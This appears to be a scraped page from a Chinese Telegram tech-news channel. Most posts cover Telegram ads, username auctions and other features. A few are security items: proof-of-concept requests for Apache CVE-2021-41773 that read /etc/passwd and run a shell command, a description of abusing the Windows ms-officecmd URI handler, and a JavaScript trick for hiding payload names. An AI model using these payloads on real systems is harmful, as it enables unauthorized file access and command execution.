九秒RAM
126 subscribers
114 photos
13 videos
4 files
57 links
随意标注一些网络信息、资源
Download Telegram
九秒RAM
Apache HTTP Server 路径遍历 影响 只影响 2.4.49 版本 解决方案 更新到 2.4.50 及以上 CVE-2021-41773 PoC验证 127.0.0.1/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd #Apache #越权 #访问 #漏洞 Via @RAM9s
#更新

最近 Apache HTTP Server 2.4.49 爆出的 CVE-2021-41773 不仅仅是一般的越权访问漏洞,还可以更进一步到远程代码执行

PoC验证
curl --data "A=|echo;id" 'http://127.0.0.1/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'

解决
版本更新至 2.4.51 及以上

*该版本对外暴露的实例目前超过 10w+
#Apache #漏洞
Via @RAM9s
Telegram 频道上的赞助商广告即将上线测试全面铺开

通过Telegram官方翻译平台上最近更新的字段说明

从中我们可以知道一些相关细节
◆广告投放来自Telegram广告,而不是频道管理员自定义的广告
◆赞助商广告目前处于测试阶段
◆测试阶段,只有Telegram从广告中收益
◆后续Telegram官方将专门上线广告投放平台(网站)
◆一旦正式上线,在Telegram扣除基础运营成本后,广告相关收益将与频道所有者分享
◆每个频道仅展示一个赞助商广告位
◆目前赞助商广告位于频道消息最底部(看完所有频道消息推送后才显示)
◆广告商可以自主选择广告渠道来进行业务推广(目前仅频道)
◆Telegram不会追踪用户是否点击了赞助商广告
◆赞助商广告内将不支持外部链接
◆赞助商广告的展示推送仅基于频道主题而非访客(意味着访问同一频道的每位用户将会看到相同的广告)

目前广告投放素材要求
●仅支持文本
●最大长度不超过160个字符

*翻译平台上发布的信息与Telegram广告业务的最终执行呈现不具有百分百确定性,只有最终发布上线后我们才能知道它实际上是如何工作

#Telegram #广告渠道
Via @RAM9s
This media is not supported in your browser
VIEW IN TELEGRAM
Telegram 广告投放平台上线测试相关细节

◆广告投放在用户订阅数大于 1K的频道上
◆广告基于频道的主题分类、上下文投放
◆广告内容为纯文本不超过 160个字符
◆目前每千次展示最低费用为 2 欧元

🚫条款明文禁止的内容
-惊悚、色情的内容
-仇恨、暴力、骚扰
-第三方商业权利(版权、商标等)
-欺骗性、误导性或掠夺性广告
-涉及选举或政治的广告
-赌博广告
-欺骗性或有害的金融产品或服务
-医疗服务、药物、补剂(保健品)
-药物、酒精、烟草、快餐(外卖)
-武器、火器、炸药、弹药
-垃圾邮件软件、恶意软件、黑客攻击
-有合法性问题的产品或服务(假证、泄露的个人数据等等)

Telegram广告投放平台预期是面向大型广告投放商开放
条款显示:为确保维护在 Telegram 平台上推出的高质量广告内容,最低首付充值需要 两百万 欧元,其中一百万欧作为押金,若广告商12个月内广告投放小于 一千万 欧元,则押金扣留不退,一年内投放花费超过 一千万 欧元则押金退回

Telegram Ads 入口
Telegram广告投放指南
Telegram广告投放服务条款

Via @RAM9s
Telegram 近期即将到来的新特性

私人频道/群组将支持禁止用户转发和保存媒体资源文件到本地
*除一般场景的内容分享行为被禁止,还将禁止包括:文字复制、截屏
*目前看仅交互层的禁止、限制、不可用
支持用户使用公开频道频道主的身份在公开群组中发言
*条件
-切换发言身份时自身至少创建有一个公共频道(最多显示十个可选用)
-仅能以公开频道主(所有者)身份进行发言(即频道的一般管理员不能代表频道对外发言)
*从接受者来看,与一般发言无异(查看发言者简介将进入频道)
*类似现有的,以频道主身份进入语音聊天
支持选择任意时间段内的所有消息进行删除
*日历中长按当天有消息预览

💡消息来源
Telegram官方发布的Android开发者大赛
Конкурс для разработчиков под Android

*仅依据现有信息源做前瞻解读、猜测
*不代表不确定Telegram最终实现以及品质

#Telegram #特性 #功能
Via @RAM9s
Telegram 邀请链接更新

从今天开始,
新的邀请链接结构更新如下
t.me/+Qwertyuiop

之前创建邀请链接带有前缀 joinchat
t.me/joinchat/Qwertyuiop

*目前群组邀请链接已更新,频道还未同步更新此变化
*链接更为精简,具体用法与以往一样

Via @RAM9s
Windows 10/11 默认URI处理程序可被利用执行任意命令

Demo演示为
基于 ms-officecmd: URI (它用于Microsoft Office UWP 应用程序启动其它 Office 桌面应用程序),利用 URI 处理程序的参数绕过默认安全措施,最终通过 --gpu-launcher 传参(需安装有Microsoft Teams )注入执行任意命令

前提条件
已安装 Microsoft Teams 但未运行
*仅旧版 IE 11/Edge 浏览器可静默触发执行

防范缓解措施
暂无官方补丁,建议浏览器更新到最新版,别乱点弹窗(尤其是弹窗提示中包含有打开 ms-officecmd: 应用字样)、卸载 Microsoft Teams Electron 应用程序等

URL协议被利用执行任意代码类似有:
steam: URI 处理程序中的代码执行(2012)
teamviewer10: URI 处理程序中的代码执行(CVE-2020-13699)

#Windows #漏洞利用 #RCE
Via @RAM9s
Telegram 群组/频道 消息支持点赞交互

此前开发大赛交互原型基本一致
已在最新测试版(Android/iOS端)上线可用

Via @RAM9s
Telegram CEO近日有关广告投放问题公开发言

#Telegram #预期 #机翻
Via @RAM9s
👍2
This media is not supported in your browser
VIEW IN TELEGRAM
Telegram v8.7.0 预更新功能特性

▍全新Web Bot类型,将内联WebApp互动
(重大功能更新,交互见视频演示)
▍群组/频道中的置顶消息将支持更多交互特性:
关联频道的评论区入口、Bot按钮互动等
▍消息自毁将有更多周期选择,支持自定义时间
▍支持将自定义音频文件设置为通知提示音
▍转发将带上最初消息来源以及转发关系链条

#Telegram #重大 #更新 #功能 #特性
Via @RAM9s
Yandex 开源发布自用分布式SQL数据库 YDB

特性
跨多行多表ACID事务保持强一致性
水平可拓展:计算与存储层可独立拆分
高可用:实例部署超1W节点/PB级数据/每秒百万事务
自动故障恢复:单点故障自动恢复所需数据冗余

其它
基于 C/C++ 开发
开源使用 Apache-2.0 License 授权
默认通过 gRPC 接口(2135/2136)交互

GitHub 源代码 | YouTube 介绍

#开源 #数据库
Via @RAM9s
在JS代码中隐藏有效负载

例如,
通过 parseInt 函数将字符串转换为 36 进制数值:

> parseInt('alert',36)
< 17795081

然后,使用 toString 函数将数字转换回字符串:

> top[17795081..toString(36)]()

#技巧 #思路
Via @RAM9s
Telegram 大量回收闲置公开频道用户名

执行时间点
2022年8月18,19日之间

用户名被回收的频道大部分处于非活跃状态:
没有内容
没有订阅数
超过半年没有发布内容

据悉,这不是 Telegram 第一次采取此类行动。目前,已被删除的频道用户名无法重新注册占用,预期几个月后它们才会被释放恢复可用
*此次Telegram回收操作,全程无任何提示与提前说明,用户仅能通过查看频道状态改变(由公开转为私密)以及近期频道操作日志知道变化
*有消息称,Telegram用户名注册使用这块后续可能会改革上线新的机制

#提示 #Telegram
Via @RAM9s
Heroku 宣布停止提供免费应用

#heroku #宣布
Via @RAM9s
Telegram 团队 最近干了什么?

图为 Telegram CEO durov 最近发言,已使用机器直接翻译

#Telegram #频道 #机翻
Via @RAM9s
在命令行中移动光标的快捷键

#技巧
Via @RAM9s
九秒RAM
首批Telegram用户名NFT正在TON网络中铸造测试 有关Telegram用户名的两个NFT合约地址 可能用于公测 EQDZHFndpcOMMeX14z5DRzIZcPtij2Apq13d_jysAJHnisMM 调试测试用(debug) EQBF2faVEwsbf7_5ISAGMGCNADztVVSFyNhVSzJ6TdkbmfxK Telegram Team的TON钱包地址 EQAuz15H1ZHrZ_psVrAra7HealMIVeFq0wguqlmFno1f3EJj 时间线 大概四周前,TON基金会向Telegram…
Telegram 用户名拍卖平台已启动

💡拍卖规则
用户可以自助开拍
单个拍卖封板周期 7天
时间一到按价高者得,竞价被超过则退款

主要竞价
4位用户名,起拍价 10000 TON
5位用户名,起拍价 500 TON

*目前主要拍卖 4,5位短名为主以及一些常见常用的单词组成的长用户名
*所拍得用户名将暂时不可用,需要等Telegram更新后才可用
*所拍用户名可绑定用于 Telegram个人账号、群组、频道 用户名使用
*用户名所有权以NFT方式寄存在TON钱包上,可以随时与Telegram账号解绑转移
*拍卖平台官网 fragment.com 同步提供有机器人 @fragment 用于通知提示竞拍出价状态

注意
*涉及区块链上所有操作:参与举牌、接回退款、接收NFT 都会存在延迟
*貌似该平台并非由Telegram官方运营
*该平台不对美国地区IP用户可用


#Telegram #NFT #拍卖
Via @RAM9s
九秒RAM
已由 Telegram CEO Pavel Durov 以及多个Telegram官方媒体频道的确认 Fragment 平台上线启动 Pavel Durov 宣布 推出一个购买和销售 Telegram 用户名的平台 - Fragment Durov 表示,几天后,Telegram 将为用户提供在 Fragment 拍卖会上出售其当前用户名的机会 #Telegram #用户名 #拍卖 Via @RAM9s
在 Fragment 拍卖中出售Telegram用户名

‌‎现在可以通过 Fragment 网站上的拍卖出售用户在 Telegram 中的任何用户名
*目前看,持有的Bot用户名除外

自有用户名如何进行拍卖出售?
需要在该平台上同时登陆 Telegram 账号并链接 TON 钱包,然后设置初始出价,拍卖将从该出价开始。最低起拍价为 10 TON

在 Fragment 网站上,我的账号中有一个“我的用户名”按钮。 “不可收藏的用户名”部分显示当前账号名下所有用户名:个人账号、群组以及频道

如果没人出价竞拍,你将获得初始报价减去 5% 的佣金和 5 TON

如果有人出价超过你,你将获得后续最高出价的 95% 加上初始报价

禁止在拍卖中出售已被屏蔽的用户名

#Telegram #用户名 #拍卖
Via @RAM9s